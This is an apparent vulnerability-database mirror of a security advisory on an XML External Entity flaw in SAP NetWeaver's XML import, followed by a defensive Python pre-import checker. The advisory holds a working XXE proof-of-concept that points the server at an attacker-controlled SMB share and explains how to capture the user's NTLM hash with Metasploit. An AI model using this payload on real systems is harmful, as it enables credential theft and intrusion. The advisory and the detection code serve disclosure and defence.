SAP Netweaver XML External Entity Injection

21 Sep 2015 00:00:00 | Reported by Lukasz Miedzinski | Type: packetstorm | Source: packetstormsecurity.com

SAP Netweaver XML External Entity Injection CVE-2015-724

`Title: SAP NetWeaver - XML External Entity Injection  
Author: Lukasz Miedzinski  
GPG: Public key provided in attachment  
Date: 29/10/2014  
CVE: CVE-2015-7241  
  
Affected software :  
===================  
  
SAP NetWeaver : <7.01  
  
Vendor advisories (only for customers):  
===================  
External ID : 851975 2014  
Title: XML External Entity vulnerability in SAP XML Parser  
Security Note: 2098608  
Advisory Plan Date: 12/5/2014  
Delivery date of fix/Patch Day: 10/2/2014  
CVSS Base Score: 5.5  
CVSS Base Vector: AV:N/AC:L/AU:S/C:P/I:N/A:P  
  
  
Description :  
=============  
An XML External Entity Injection vulnerability has been found in the XML  
parser in the System Administration -> XML Content and Actions -> Import  
section.  
  
  
Vulnerabilities :  
*****************  
  
XML External Entity Injection :  
======================  
  
  
The example shows how a pentester is able to get the NTLM hash of the application's user.  
  
Content of file (PoC) :  
  
<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE root [  
<!ENTITY % remote SYSTEM "file:////Tester.IP/test"> %remote; %param1; ]>  
<root/>  
  
When the pentester has the Metasploit smb_capture module running, the  
application will contact him and provide the NTLM hash of the user.  
  
  
Contact :  
=========  
  
Lukasz[dot]Miedzinski[at]gmail[dot]com  
`
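
A defensive pre-import check for the Import function described in the advisory, added here as an example (it is not code from the advisory or from SAP): it reads only the prolog of an uploaded XML file with Python's expat binding, which does not resolve external entities, rejects any document carrying a DOCTYPE, and reports external entities whose system identifier points at a remote host, such as the UNC-style target in the PoC. The names `audit_import` and `remote_host` and the reject-on-DOCTYPE policy are assumptions of this example.

```python
import xml.parsers.expat as expat
from urllib.parse import urlsplit

# PoC document from the advisory, embedded as sample input.
POC = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "file:////Tester.IP/test"> %remote; %param1; ]>
<root/>"""

class _PrologDone(Exception):
    """Raised at the first element: the DTD has been seen, stop parsing."""

def remote_host(system_id):
    """Return the host a system identifier points at, or None if it is local."""
    parts = urlsplit(system_id.replace("\\", "/"))
    if parts.netloc:                      # file://host/share, http://host/x, \\host\share
        return parts.netloc
    if parts.scheme in ("", "file") and parts.path.startswith("//"):
        return parts.path.lstrip("/").split("/", 1)[0]   # file:////host/share
    return None

def audit_import(xml_bytes):
    """Return (allowed, findings). Assumed policy: any DOCTYPE rejects the upload."""
    findings = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        host = remote_host(system_id) if system_id else None
        findings.append(("doctype", name, system_id, host))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None:         # external entity: fetched if a parser expands it
            label = ("%" if is_param else "&") + name
            findings.append(("external-entity", label, system_id, remote_host(system_id)))

    def on_element(name, attrs):
        raise _PrologDone                 # content is never parsed, only the prolog

    parser = expat.ParserCreate()         # pyexpat does not fetch external entities itself
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.StartElementHandler = on_element
    try:
        parser.Parse(xml_bytes, True)
    except _PrologDone:
        pass
    except expat.ExpatError as exc:       # malformed input is rejected too
        findings.append(("malformed", str(exc), None, None))
    return (not findings, findings)

if __name__ == "__main__":
    print(audit_import(POC))
```

A remote host in the findings is also the value to match against outbound SMB connections from the application server when reviewing firewall or proxy logs.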

21 Sep 2015 00:00 (current)
Vulners AI Score: 0.6 (Low risk)
EPSS: 0.27377